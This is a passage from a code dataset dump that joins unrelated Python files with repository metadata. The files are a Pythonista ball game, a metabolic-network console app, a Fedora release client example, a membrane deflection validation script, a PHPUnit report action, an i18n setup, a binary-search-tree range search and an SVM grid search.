self.sz = kwargs['size']\n ap = anchor_point\n \n # Set the boundaries\n self.left = self.pos[0] - self.sz[0] * ap[0]\n self.right = self.pos[0] + self.sz[0] * (1-ap[0])\n self.bottom = self.pos[1] - self.sz[1] * ap[1]\n self.top = self.pos[1] + self.sz[1] * (1-ap[1])\n \n # Set up the background image\n self.img = SpriteNode('a/button.png')\n self.img.position = (self.rm_pos[0], self.rm_pos[1])\n self.img.size = self.sz\n self.img.alpha = 0.5\n self.img.anchor_point = (0, 0)\n \n # 
Set up the text\n self.butt = LabelNode(text=text, font=font, color=red)\n self.butt.position = (self.rm_pos[0] + self.sz[0]/2, self.rm_pos[1] + self.sz[1]/2)\n self.butt.anchor_point = (0.5, 0.5)\n \n def text(self, str):\n self.butt.text = str\n \n def detect_touch(self, loc):\n tCnd = [loc[0] > self.left,\n loc[0] < self.right,\n loc[1] > self.bottom,\n loc[1] < self.top]\n return all(tCnd)\n \n def add(self, t=0.5):\n move_action = Action.move_to(self.left, self.bottom, t, TIMING_SINODIAL)\n self.img.run_action(move_action)\n move_action = Action.move_to(self.left + self.sz[0]/2, self.bottom + self.sz[1]/2, t, TIMING_SINODIAL)\n self.butt.run_action(move_action)\n \n def rm(self, t=0.5):\n move_action = Action.move_to(self.rm_pos[0], self.rm_pos[1], t, TIMING_SINODIAL)\n self.img.run_action(move_action)\n move_action = Action.move_to(self.rm_pos[0] + self.sz[0]/2, self.rm_pos[1] + self.sz[1]/2, t, TIMING_SINODIAL)\n self.butt.run_action(move_action)\n\nif engine == 'ista':\n \n class Game (Scene):\n def setup(self):\n\n # Initialize the motion module\n motion.start_updates()\n\n # Add the game state classes to the scene\n self.touchCycle = False\n \n # Initialize the counter for the splash screen\n self.kSplash = 0\n self.splash = SpriteNode('a/splash.png')\n self.splash.size = (width, height)\n self.splash.anchor_point = (0.0, 0.0)\n self.splash.position = (0, 0)\n self.add_child(self.splash)\n self.splash.alpha = 0\n fade_action = Action.fade_to(1, 2)\n self.splash.run_action(fade_action)\n \n # Generate the sky blue background and images\n self.background_color = skyBlue\n self.bg = MyBackground() \n \n # Initialize the buttons or sticks\n self.moveStick,self.moveAura = initStick(self,0.1,0.2*width,(1,0),(width,height/20))\n self.tiltStick,self.tiltAura = initStick(self,0.1,0.2*width,(0,0),(0,height/20))\n self.add_child(self.moveAura)\n self.add_child(self.tiltAura)\n \n # Initialize the score line\n score_font = ('Menlo', 11)\n self.time_label = LabelNode('Time', score_font, parent=self,color=white)\n self.time_label.anchor_point = (0.0, 1.0)\n self.time_label.position = (width*0.01, height - 2)\n self.time_label.z_position = 1\n \n self.dist_label = LabelNode('Distance', score_font, parent=self, color=white)\n self.dist_label.anchor_point = (0.0, 1.0)\n self.dist_label.position = (width*0.21, height - 2)\n self.dist_label.z_position = 1\n \n self.high_label = LabelNode('Height', score_font, parent=self,color=white)\n self.high_label.anchor_point = (0.0, 1.0)\n self.high_label.position = (width*0.42, height - 2)\n self.high_label.z_position = 1\n \n self.boing_label = LabelNode('Boing!', score_font, parent=self,color=white)\n self.boing_label.anchor_point = (0.0, 1.0)\n self.boing_label.position = (width*0.62, height - 2)\n self.boing_label.z_position = 1\n \n self.score_label = LabelNode('Score', score_font, parent=self,color=white)\n self.score_label.anchor_point = (0.0, 1.0)\n self.score_label.position = (width*0.82, height - 2)\n self.score_label.z_position = 1\n \n # Get ranges for drawing the player and ball\n xrng, yrng, m2p, po, m2r, ro = setRanges(gs.u, width)\n \n # Initialize the ball image\n self.ball = SpriteNode('a/ball.png')\n dbPix = 2*p.rb*m2p\n self.ball.size = (dbPix, dbPix)\n self.ball.anchor_point = (0.5, 0.5)\n self.ball.position = (gs.xb*m2p+po, (gs.yb+p.rb)*m2p)\n \n # Initialize the player's head\n self.head = SpriteNode('a/myFace.png')\n spPix = 0.7*m2p\n self.head.size = (spPix, spPix)\n self.head.anchor_point = (0.5, 0.0)\n self.head.position = 
(gs.xp[0]*m2p+po, (gs.yp[0]+p.d)*m2p)\n \n self.head1 = SpriteNode('a/LadyFace.png')\n self.head1.size = (spPix, spPix)\n self.head1.anchor_point = (0.5, 0.0)\n self.head.position = (gs.xp[1]*m2p+po, (gs.yp[1]+p.d)*m2p)\n\n # Initialize Stools\n self.stool = SpriteNode('a/stool.png')\n self.stool.size = (0.7*m2p, m2p)\n self.stool.position = (gs.xp[0]*m2p+po, (gs.yp[0]+p.d)*m2p)\n self.stool.anchor_point = (0.5, 1.0)\n \n self.stool1 = SpriteNode('a/stool.png', color=gray)\n self.stool1.size = (0.7*m2p, m2p)\n self.stool1.position = (gs.xp[1]*m2p+po, (gs.yp[1]+p.d)*m2p)\n self.stool1.anchor_point = (0.5, 1.0)\n\n # Initialize Buttons\n self.actionButt = OptionButtons(text='Begin', font=(p.MacsFavoriteFont, 20), position=(0.99*width, 0.92*height), size=(0.18 * width, 0.04 * width), anchor_point=(1,1))\n \n self.option_butt = OptionButtons(text='Options', font=(p.MacsFavoriteFont, 20), position=(0.01*width,0.92*height), size=(0.18 * width, 0.04 * width), anchor_point=(0,1))\n \n self.add_child(self.actionButt.butt)\n self.add_child(self.actionButt.img)\n self.add_child(self.option_butt.butt)\n self.add_child(self.option_butt.img)\n self.actionButt.text('Begin')\n \n self.singleButt = OptionButtons(text='Single Drubble', font=(p.MacsFavoriteFont,36), size=(0.8*width,0.2*height), position=(0.5*width, 0.75*height), rm_pos=(-1.5*width, 0.75*height))\n self.doubleButt = OptionButtons(text='Double Drubble', font=(p.MacsFavoriteFont,36), size=(0.8*width,0.2*height), position=(0.5*width, 0.5*height), rm_pos=(1.5*width, 0.5*height))\n \n self.add_child(self.singleButt.butt)\n self.add_child(self.singleButt.img)\n self.add_child(self.doubleButt.butt)\n self.add_child(self.doubleButt.img)\n \n toggleVisibleSprites(self, False)\n\n # Start the drums\n self.current_drum = 0\n drum_player[self.current_drum].play()\n \n def update(self):\n # Update if there was a touch\n if self.touchCycle:\n cycleModes(gs, stats, engine)\n if gs.game_mode == 2:\n self.singleButt.add()\n self.doubleButt.add()\n \n if gs.game_mode == 3:\n self.singleButt.rm()\n self.doubleButt.rm()\n toggleVisibleSprites(self,True)\n \n \n if gs.game_mode == 4:\n self.actionButt.text('Set Angle')\n \n if gs.game_mode == 5:\n self.actionButt.text('Set Speed')\n \n if gs.game_mode == 6:\n self.actionButt.text('Restart')\n \n self.touchCycle = False\n \n # Get control inputs\n if gs.ctrlMode == 'motion':\n gs.setControl(g=motion.get_gravity(), a=motion.get_user_acceleration()) \n elif gs.ctrlMode == 'vStick' and gs.game_mode>1:\n gs.setControl(moveStick=self.moveStick.ctrl,\n tiltStick=self.tiltStick.ctrl)\n \n # Move auras\n xy = self.moveStick.ctrl\n c = self.moveStick.cntr\n s = self.moveStick.size[0]/3\n self.moveAura.position = (c[0]+xy[0]*s,c[1]+xy[1]*s)\n xy = self.tiltStick.ctrl\n c = self.tiltStick.cntr\n self.tiltAura.position = (c[0]+xy[0]*s,c[1]+xy[1]*s)\n \n ## ANGLE AND SPEED SETTINGS\n if gs.game_mode>2 and gs.game_mode<6:\n gs.setAngleSpeed()\n \n # Run one simulation step\n gs.simStep(p, gs, stats)\n if gs.game_mode == 6:\n stats.update(gs)\n xrng, yrng, m2p, po, m2r, ro = setRanges(gs.u, width)\n if gs.StoolBounce:\n sound.play_effect('digital:PhaseJump3')\n if gs.FloorBounce and not gs.Stuck:\n sound.play_effect('game:Error')\n \n # Play the drum beat\n if drum_player[self.current_drum].current_time > 0.985 * drum_player[self.current_drum].duration:\n next_drum = 1\n if next_drum == self.current_drum:\n drum_player[self.current_drum].current_time = 0.0\n else:\n self.current_drum = next_drum\n 
drum_player[self.current_drum].play()\n #drums.play_ista()\n \n # Update score line\n self.time_label.text = 'Time - %10.1f' % gs.t\n self.dist_label.text = 'Distance - %6.1f' % stats.stoolDist\n self.high_label.text = 'Height - %8.2f' % stats.maxHeight\n self.boing_label.text = 'Boing! - %6.0f' % stats.stoolCount\n self.score_label.text = 'Score - %9.0f' % stats.score\n \n # update the ball sprites\n dbPix = 2*p.rb*m2p\n self.ball.size = (dbPix, dbPix)\n x,y = xy2p(gs.xb, gs.yb, m2p, po, width, height)\n self.ball.position = (x, y)\n \n # Update the head and stool sprites\n spPix = 0.7*m2p\n self.head.size = (spPix, spPix)\n x,y = xy2p(gs.xp[0], gs.yp[0]+p.d, m2p, po, width, height)\n self.head.position = (x, y)\n \n self.stool.size = (0.7*m2p, m2p)\n x,y = xy2p(gs.xp[0] - gs.lp[0] * np.sin(gs.tp[0]), gs.yp[0]+p.d + gs.lp[0] * np.cos(gs.tp[0]), m2p, po, width, height)\n self.stool.position = (x, y)\n self.stool.rotation = gs.tp[0]\n \n if p.nPlayer > 1:\n self.head1.size = (spPix,spPix)\n x,y = xy2p(gs.xp[1], gs.yp[1]+p.d, m2p, po, width, height)\n self.head1.position = (x,y)\n \n self.stool1.size = (0.7*m2p, m2p)\n x,y = xy2p(gs.xp[1] - gs.lp[1] * np.sin(gs.tp[1]), gs.yp[1]+p.d + gs.lp[1] * np.cos(gs.tp[1]), m2p, po, width, height)\n self.stool1.position = (x, y)\n self.stool1.rotation = gs.tp[1]\n \n def draw(self):\n # Show the splash screen\n if gs.game_mode == 1:\n #makeSplashScreen(self)\n if not gs.showedSplash:\n self.kSplash += 2\n else:\n xrng, yrng, m2p, po, m2r, ro = setRanges(gs.u, width)\n \n # Generate the background\n if gs.game_mode>2:\n # Update the background\n xMean = (gs.xb+gs.xp[0])/2.0\n self.bg.update(xMean,gs.yb,width,height,m2p)\n \n if gs.game_mode>2:\n # Generate the bottom line\n stroke(black)\n stroke_weight(height/20)\n line(0,height/40,width,height/40)\n \n # Generate the markers\n makeMarkers(xrng,m2p,po)\n \n # Generate the trajectory\n linePlot(gs.xTraj,gs.yTraj,m2p,po,width,height,white,1)\n \n for k in range(p.nPlayer):\n # Generate a player image\n xv,yv,sx,sy = stickDude(gs,k)\n linePlot(xv,yv,m2p,po,width,height,p.playerColor[k],0.15*m2p)\n \n # Generate a stool image\n #linePlot(sx,sy,m2p,po,width,height,p.stoolColor[k],0.1*m2p)\n \n def touch_began(self, touch):\n # Reset if necessary\n if gs.game_mode == 1 and self.kSplash >= 255:\n self.touchCycle = True\n move_action = Action.move_to(0, -height, 0.5, TIMING_SINODIAL)\n self.splash.run_action(move_action)\n \n if gs.game_mode == 2:\n b1 = self.singleButt.detect_touch(touch.location)\n b2 = self.doubleButt.detect_touch(touch.location)\n if b1 or b2:\n self.touchCycle = True\n p.nPlayer = b1 + 2*b2\n self.singleButt.rm()\n self.doubleButt.rm()\n \n if gs.game_mode > 2 and self.actionButt.detect_touch(touch.location):\n self.touchCycle = True\n \n if gs.game_mode > 2 and self.option_butt.detect_touch(touch.location):\n gs.game_mode = 1\n toggleVisibleSprites(self,False)\n self.touchCycle = True\n \n # Detect control inputs\n xy = touchStick(touch.location,self.moveStick)\n if xy[0] != 0:\n \tself.moveStick.ctrl = xy\n \tself.moveStick.id = touch.touch_id\n \tself.moveAura.alpha = 1\n \t\n xy = touchStick(touch.location,self.tiltStick)\n if xy[0] != 0:\n \tself.tiltStick.ctrl = xy\n \tself.tiltStick.id = touch.touch_id\t\n \tself.tiltAura.alpha = 1\n \n def touch_moved(self,touch):\n # Detect control inputs\n xy = touchStick(touch.location,self.moveStick)\n if touch.touch_id == self.moveStick.id and xy[0] != 0:\n self.moveStick.ctrl = xy\n \n xy = touchStick(touch.location,self.tiltStick)\n if 
touch.touch_id == self.tiltStick.id and xy[0] != 0:\n self.tiltStick.ctrl = xy\n \n \n def touch_ended(self,touch):\n if touch.touch_id == self.moveStick.id:\n self.moveStick.ctrl = (0,0)\n self.moveAura.alpha = 0.5\n \n if touch.touch_id == self.tiltStick.id:\n self.tiltStick.ctrl = (0,0)\n self.tiltAura.alpha = 0.5\n \n def stop(self):\n motion.stop_updates()\n \n if __name__ == '__main__':\n run(Game(), LANDSCAPE, frame_interval=60.0/fs,show_fps=False)\n \n \n \n \n","repo_name":"radcli14/drubble","sub_path":"obsolete/dRuBbLe.py","file_name":"dRuBbLe.py","file_ext":"py","file_size_in_byte":21988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2479081703","text":"from application import RunMetabolicalNetworkController\r\nfrom shared import InputOptions\r\nimport sys\r\n\r\n\r\n'''\r\n User interface with console mode.\r\n'''\r\n\r\ndef get_boolean(input_response):\r\n 'Check the input response and returns True/False.'\r\n return input_response in ['y', 'yes', 'Y', '', None]\r\n\r\ndef get_options_from_user():\r\n 'Shows the functionalities to the user and get their response.'\r\n\r\n options = {}\r\n\r\n tmp = input(\"Please insert the absolute path of the network file: \")\r\n options[InputOptions.FILEPATH] = get_sanitized_string(tmp)\r\n\r\n tmp = input(\"Topological analysis [Y|n]? \")\r\n options[InputOptions.TOPOLOGICAL_ANALYSIS] = get_boolean(tmp)\r\n\r\n tmp = input(\"Graphical visualization of metabolic network [Y|n]? \")\r\n options[InputOptions.GRAPHIC_VISUALIZATION] = get_boolean(tmp)\r\n\r\n tmp = input(\"Number of reactions and metabolites [Y|n]? \")\r\n options[InputOptions.NUMBER_REACT_MET] = get_boolean(tmp)\r\n\r\n tmp = input(\"Final metabolites produced by metabolit network [Y|n]? \")\r\n options[InputOptions.FINAL_METABOLITES] = get_boolean(tmp)\r\n\r\n tmp = input(\"Please insert a metabolites (splitted by space) to return all reactions activated: \")\r\n options[InputOptions.ALL_REACTIONS] = put_elements_in_list(tmp)\r\n\r\n tmp = input(\"Five frequent metabolites [Y|n]? \")\r\n options[InputOptions.TOP5_METABOLITES] = get_boolean(tmp)\r\n\r\n tmp = input(\"Please insert a metabolites (splitted by space) to return all metabolites excreted: \")\r\n options[InputOptions.ALL_PRODUCTS] = put_elements_in_list(tmp)\r\n\r\n tmp = input(\"Automatic generation of metabolic network [Y|n]? 
\") \r\n options[InputOptions.AUTO_GENERATION] = get_boolean(tmp)\r\n if options[InputOptions.AUTO_GENERATION]:\r\n tmp = input(\"Please provide the pathway (KEGG pathway code): \")\r\n options[InputOptions.AUTO_GENERATION_PATHWAY] = get_sanitized_string(tmp)\r\n\r\n return options\r\n\r\ndef get_mock_options():\r\n 'Returns the default response to testing the program.'\r\n\r\n return {\r\n InputOptions.FILEPATH: 'example-net.txt',\r\n InputOptions.TOPOLOGICAL_ANALYSIS: True,\r\n InputOptions.GRAPHIC_VISUALIZATION: False,\r\n InputOptions.NUMBER_REACT_MET: True,\r\n InputOptions.FINAL_METABOLITES: True,\r\n InputOptions.ALL_REACTIONS: [],\r\n InputOptions.TOP5_METABOLITES: True,\r\n InputOptions.ALL_PRODUCTS: [],\r\n InputOptions.AUTO_GENERATION: False,\r\n InputOptions.AUTO_GENERATION_PATHWAY: \"map00061\"\r\n }\r\n\r\ndef put_elements_in_list(input_response):\r\n 'Retrieves the input response and puts it in a list.'\r\n result = get_sanitized_string(input_response)\r\n if not result: \r\n return []\r\n\r\n return [element for element in result.split(\" \")]\r\n\r\ndef get_sanitized_string(input_response):\r\n 'Retrieves the input response.'\r\n\r\n return input_response.strip()\r\n\r\ndef show_welcome_message():\r\n 'Prints the welcome message.'\r\n\r\n print(\"Welcome to MetNet app!\\n\")\r\n\r\ndef show_goodbye_message():\r\n 'Prints the final message.'\r\n\r\n print(\"Thanks for using this app!\")\r\n\r\ndef show_results_message():\r\n 'Prints the results message.'\r\n print(\"Results: \\n\")\r\n\r\ndef show_result(prompt, result, new_line=False, is_list=False):\r\n 'Prints results of each functionality.'\r\n\r\n if result:\r\n if new_line:\r\n print(prompt)\r\n print(str(result))\r\n\r\n if is_list:\r\n print(prompt, \" \".join(str(element) for element in result), \"\\n\")\r\n\r\n else:\r\n print(prompt, str(result), \"\\n\")\r\n \r\ndef run():\r\n 'Allows the interaction with the user in console mode. Shows the functionalities and their results.'\r\n\r\n show_welcome_message()\r\n\r\n if len(sys.argv) > 1 and sys.argv[1] == \"test\":\r\n options = get_mock_options()\r\n \r\n else:\r\n options = get_options_from_user()\r\n\r\n try:\r\n controller = RunMetabolicalNetworkController(options)\r\n controller.load_from_file()\r\n\r\n show_results_message()\r\n\r\n betweeness, closeness = controller.get_topological_analysis()\r\n show_result('Betweeness centrality: ', betweeness, is_list=True)\r\n show_result('Closeness centrality: ', closeness, is_list=True)\r\n \r\n result = controller.get_graphical_visualization()\r\n show_result(\"Graphical representation. \", result, new_line=True)\r\n\r\n result = controller.get_number_reactions_metabolites()\r\n show_result(\"Number of reactions: \", result[0])\r\n show_result(\"Number of metabolites: \", result[1])\r\n \r\n result = controller.get_final_metabolites()\r\n show_result(\"Final metabolites: \", result, is_list=True)\r\n\r\n result = controller.get_active_reactions()\r\n show_result(\"Active reactions: \", result, is_list=True)\r\n\r\n result = controller.get_top5_metabolites()\r\n show_result(\"Frequent metabolites: \", result, is_list=True)\r\n\r\n result = controller.get_metabolites_excreted()\r\n show_result(\"Metabolites excreted: \", result, is_list=True)\r\n\r\n result = controller.generate_metabolic_networks()\r\n show_result(\"Metabolic network generated. 
Please check the results.\", result)\r\n\r\n except Exception as e:\r\n print(\"There was an error: \", str(e))\r\n\r\n show_goodbye_message()","repo_name":"paty-oliveira/MetabolicNetwork","sub_path":"metnet/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69922953833","text":"from fpdc_client import FPDC, Release\n\nserver = FPDC(url=\"http://localhost:8000\")\nserver.connect()\n\n# Use oidc-register to get a client_secret.json file\nserver.login(auth_file=\"client_secrets.json\")\nnew_release = Release.create(\n {\n \"release_id\": \"fedora-42\",\n \"short\": \"f42\",\n \"version\": \"42\",\n \"name\": \"Fedora\",\n \"release_date\": \"2042-01-01\",\n \"eol_date\": \"2042-12-31\",\n \"sigkey\": \"towel\",\n }\n)\n\nreleases = Release.all()\nfor release in releases:\n print(release)\n","repo_name":"fedora-infra/fpdc","sub_path":"examples/create_release.py","file_name":"create_release.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"4329909302","text":"\"\"\"\nInput file for validation of PS, Hencky problem\n\"\"\"\nimport numpy as np\n\nfilename = 'hencky_mesh.msh' # mesh file\n\n# Matlab code to calculate value of b_0, as Python's sympy library is way too slow to calculate numeric values:\n\"\"\"\n clear all\n clc\n \n syms b_0\n mu = 0; % [-] Poisson's ratio\n eqn = 0 == (1-mu) * b_0 - (3-mu) / (b_0 ^ 2) - (5 - mu) * 2 / (3 * b_0 ^ 5) - (7 - mu) * 13 / (18 * b_0 ^ 8) - (9 - mu) * 17 / (18 * b_0 ^ 11) - (11 - mu) * 37 / (27 * b_0 ^ 14) - (13 - mu) * 1205 / (567 * b_0 ^ 17) - (15 - mu) * 219241 / (63504 * b_0 ^ 20) - (17 - mu) * 6634069 / (1143072 * b_0 ^ 23) - (19 - mu) * 51523763 / (5143824 * b_0 ^ 26) - (21 - mu) * 998796305 / (56582064 * b_0 ^ 29);\n sol = solve(eqn, b_0);\n \n numeric_sol = double(sol);\n tolerance = 1e-10; % Define a small tolerance\n real_solutions = numeric_sol(abs(imag(numeric_sol)) < tolerance)\n\"\"\"\n\n# precalculated values of b_0:\n# mu, b_0\n# 0.0, 1.6204\n# 0.1, 1.6487\n# 0.2, 1.6827\n# 0.3, 1.7244\n# 0.4, 1.7769\n\nb_0 = 1.6204\nr = 0.1425 # [m] radius circular membrane\np = 100 # [kPa] uniform transverse pressure\nE_t = 311488 # [N/m] Young's modules membrane material\nd = 0.01 # [m] Membrane thickness\n\nq = p*r/E_t\n\n# for n = 10, first 11 relations of the a_2n parameter\na0 = 1 / b_0\na2 = 1 / (2 * b_0 ** 4)\na4 = 5 / (9 * b_0 ** 7)\na6 = 55 / (72 * b_0 ** 10)\na8 = 7 / (6 * b_0 ** 13)\na10 = 205 / (108 * b_0 ** 16)\na12 = 17051 / (5292 * b_0 ** 19)\na14 = 2864485 / (508032 * b_0 ** 22)\na16 = 103863265 / (10287648 * b_0 ** 25)\na18 = 27047983 / (1469664 * b_0 ** 28)\na20 = 42367613873 / (1244805408 * b_0 ** 31)\na = [a0, a2, a4, a6, a8, a10, a12, a14, a16, a18, a20]\n\n\ndef analytical_solution(a_n, radius, loading_param):\n series = 0\n c = np.linspace(0, r, 16)\n w = []\n\n for coordinate in c:\n for i in range(0, 11):\n series += a_n[i] * (1 - (coordinate/radius) ** (2*i + 2))\n w.append(loading_param ** (1/3) * series)\n\n return w, c\n\n\ndef cm_and_ic(mesh_file, m, E, c):\n coordinates = []\n connections = []\n fixed = 20 # write automation later when I have more experience with the formatting of .msh files\n n = 0\n\n # read mesh file\n with open(mesh_file, 'r') as file:\n lines = file.readlines()\n\n for i, line in enumerate(lines):\n if line.startswith(\"$Nodes\"): # retrieve nodal coordinates\n 
entity_bloc, nodes_total, min_node_tag, max_node_tag = lines[i+1].split()\n n = int(nodes_total)\n total_lines = (int(entity_bloc) + int(nodes_total)) * 2 + 1\n for j in range(1, total_lines):\n if len(lines[i + j].split()) == 3:\n coordinate = lines[i + j].split()\n coordinates.append([float(coordinate[i]) for i in range(3)])\n\n if line.startswith(\"$Elements\"): # retrieve nodal connections\n entity_bloc, nodes_total, min_node_tag, max_node_tag = lines[i + 1].split()\n total_lines = int(entity_bloc) + int(nodes_total) + 2\n\n for j in range(1, total_lines):\n if len(lines[i + j].split()) != 4:\n connection = lines[i + j].split()\n connections.append([int(connection[i]) for i in range(1, len(connection))])\n\n i_c = [] # construct initial conditions matrix: [x, v, m, fixed]\n for i in range(n):\n if i < fixed:\n i_c.append([coordinates[i], [0, 0, 0], m, True])\n else:\n i_c.append([coordinates[i], [0, 0, 0], m, False])\n\n c_m = [] # construct connectivity matrix: [[index p1, index p2], ...]\n for element in connections:\n for i in range(len(element)):\n if i + 1 == len(element):\n c_m.append([element[i]-1, element[0]-1])\n else:\n c_m.append([element[i]-1, element[i+1]-1])\n c_m = list(set(tuple(sorted(pair)) for pair in c_m))\n c_m = [list(pair) for pair in c_m if pair[0] != pair[1]]\n\n e_p = [] # construct element parameter array: [k, l0, c]\n for nodes in c_m:\n node1, node2 = nodes[0], nodes[1]\n A = 0\n for element in connections:\n if node1+1 in element and node2+1 in element and len(element) > 2:\n p1 = np.array(i_c[element[0]-1][0])\n p2 = np.array(i_c[element[1]-1][0])\n p3 = np.array(i_c[element[2]-1][0])\n\n v1 = p2 - p1\n v2 = p3 - p2\n\n normal_vector = np.cross(v1, v2)\n area = np.linalg.norm(normal_vector) / 2.0\n A += 0.5*area\n l0 = np.linalg.norm(np.array(i_c[node1][0]) - np.array(i_c[node2][0]))\n A = np.sqrt(A)\n # A = A*d\n k = E*A/l0\n # print(k)\n e_p.append([k, l0, c])\n\n connections = np.array([connection for connection in connections if len(connection) == 4])-1\n return c_m, i_c, e_p, n, connections\n\n\n# dictionary of required parameters\nparams = {\n # model parameters\n \"n\": 10, # [-] number of particles\n \"k_t\": 1, # [N/m] spring stiffness\n \"c\": 1, # [N s/m] damping coefficient\n \"L\": 10, # [m] tether length\n \"m_block\": 100, # [kg] mass attached to end of tether\n \"rho_tether\": 0.1, # [kg/m] mass density tether\n\n # simulation settings\n \"dt\": 0.01, # [s] simulation timestep\n \"t_steps\": 1000, # [-] number of simulated time steps\n \"abs_tol\": 1e-50, # [m/s] absolute error tolerance iterative solver\n \"rel_tol\": 1e-5, # [-] relative error tolerance iterative solver\n \"max_iter\": 1e5, # [-] maximum number of iterations\n\n # physical parameters\n \"g\": 9.807, # [m/s**2] gravitational acceleration\n \"v_w\": [5, 0, 0], # [m/s] wind velocity vector\n 'rho': 1.225, # [kg/ m3] air density\n 'c_d_bridle': 1.05, # [-] drag-coefficient of bridles\n \"d_bridle\": 0.02 # [m] diameter of bridle lines\n}\n\n# calculated parameters\nparams[\"l0\"] = 0#np.sqrt( 2 * (grid_length/(grid_size-1))**2)\nparams[\"m_segment\"] = 1\nparams[\"k\"] = E_t*d\n\n\n# instantiate connectivity matrix and initial conditions array\nc_matrix, init_cond, element_param, params[\"n\"], element_list = cm_and_ic(filename, 1, E_t, params[\"c\"])\n\n# print(init_cond)\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n\n x = []\n y = []\n z = []\n for i in range(len(init_cond)):\n x.append(init_cond[i][0][0])\n y.append(init_cond[i][0][1])\n 
z.append(init_cond[i][0][2])\n\n fig= plt.figure()\n ax = fig.add_subplot(projection=\"3d\")\n labels = ['Mesh particle', 'Mesh spring damper element', 'Analytical solution']\n handles = []\n nodes = ax.scatter(x, y, z, c='red', label=labels[0])\n handles.append(nodes)\n for i, indices in enumerate(c_matrix):\n line = ax.plot([x[indices[0]], x[indices[1]]], [y[indices[0]], y[indices[1]]], [z[indices[0]], z[indices[1]]],\n color='black', label=labels[1])\n if i == 0:\n handles.append(line[0])\n\n deflection, radial_distance = analytical_solution(a, r, q)\n\n circle = np.linspace(0, 2*np.pi, 361)\n for i, distance in enumerate(radial_distance):\n x = np.cos(circle)*abs(distance-np.max(radial_distance))\n y = np.sin(circle)*abs(distance-np.max(radial_distance))\n z = np.ones(len(x),)*deflection[i]\n line = ax.plot(x, y, z, color='green', label=labels[2])\n if i == 0:\n handles.append(line[0])\n\n ax.legend(handles, labels)\n plt.title(\"Hencky problem\")\n plt.show()\n","repo_name":"ARBatchelor/Msc_Alexander_Batchelor","sub_path":"code_Validation/hencky_problem/hencky_problem_input.py","file_name":"hencky_problem_input.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41815990035","text":"from __future__ import annotations\nfrom os import path\nfrom typing import Final\nfrom ..base_action import BaseAction\n\n\n_WORKSPACE_DIR: Final[str] = \"/github/workspace\"\n\n\nclass PHPUnitAction(BaseAction):\n\n _report_path: str\n\n def __init__(self, artifact: str):\n super().__init__()\n\n self._report_path = f\"{_WORKSPACE_DIR}/{artifact}\"\n\n def run(self):\n if not path.exists(self._report_path):\n raise ValueError\n\n print(\"Handling action of the PHPUnit execution results...\")\n with open(self._report_path, \"r\") as file:\n print(file.read())\n\n\n\n\n","repo_name":"zloader/poc-gha-docker-python","sub_path":"src/actions/phpunit_action.py","file_name":"phpunit_action.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12019360285","text":"import gettext\n\nlocale_path = '/home/pi/py-proj/main_app/locale/'\n# zh_trans = gettext.translation('main-app', locale_path, languages=['zh_TW'])\n# en_trans = gettext.translation('main-app', locale_path, languages=['en_US'])\n# en_trans.install()\ngettext.bindtextdomain('main-app', locale_path)\ngettext.textdomain('main-app')\n_ = gettext.gettext \n\n \n\"\"\"\nimport oslo_i18n\n\n\nDOMAIN = 'main-app'\n\n_translators = oslo_i18n.TranslatorFactory(domain=DOMAIN)\n_ = _translators.primary\n_C = _translators.contextual_form\n_P = _translators.plural_form\n_LI = _translators.log_info\n_LW = _translators.log_warning\n_LE = _translators.log_error\n_LC = _translators.log_critical\n\n\ndef get_available_languages():\n return oslo_i18n.get_available_languages(DOMAIN)\n\"\"\"\n","repo_name":"jinsenglin/py-proj","sub_path":"main_app/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28412852436","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: param root: The root of the binary search tree\n @param k1: An integer\n @param k2: An integer\n @return: return: Return all keys that k1<=key<=k2 in 
ascending order\n \"\"\"\n def searchRange(self, root, k1, k2):\n # write your code here\n import queue\n if root is None:\n return []\n queue = queue.Queue()\n queue.put(root)\n result = []\n \n while not queue.empty():\n node = queue.get()\n if node.val <= k2 and node.val >= k1:\n result.append(node.val)\n if node.left:\n queue.put(node.left)\n if node.right:\n queue.put(node.right)\n \n return result \n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kunyi/tree_based_dfs/search_range_in_bst.py","file_name":"search_range_in_bst.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41650315630","text":"from sklearn.model_selection import cross_validate\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import classification_report,confusion_matrix\r\nfrom sklearn import metrics\r\n\r\nfrom .olahFile import encodingInversTransfom\r\n\r\n\r\nfrom .preprocessing import scaling\r\nfrom .preprocessing import splitData\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nC = tuple(np.arange(0.1,3.7,0.5)) \r\nkernel = ('linear', 'poly', 'rbf', 'sigmoid')\r\nmax_iter = tuple(np.arange(-1, 1000, 400))\r\ndegree = tuple(np.arange(1, 1000, 250))\r\ngamma = ('scale', 'auto')\r\ncoef0 = tuple(np.arange(0, 5.1, 1.0))\r\n\r\n\r\npoly = []\r\nrbf = []\r\nlinear = []\r\nsigmoid = []\r\nsplit_data = []\r\n\r\n\r\ndef prosesLinear(C:tuple, max_iter:tuple, x_train: 'array', y_train: 'array', cv : int):\r\n for i in C :\r\n for j in max_iter:\r\n svm = SVC(\r\n kernel = 'linear',\r\n C = i,\r\n max_iter = j\r\n )\r\n\r\n results = cross_validate(estimator = svm,\r\n X = x_train,\r\n y = y_train,\r\n cv = cv)\r\n\r\n \r\n score = float(results['test_score'].mean())\r\n\r\n linear.append([score, i, j]) 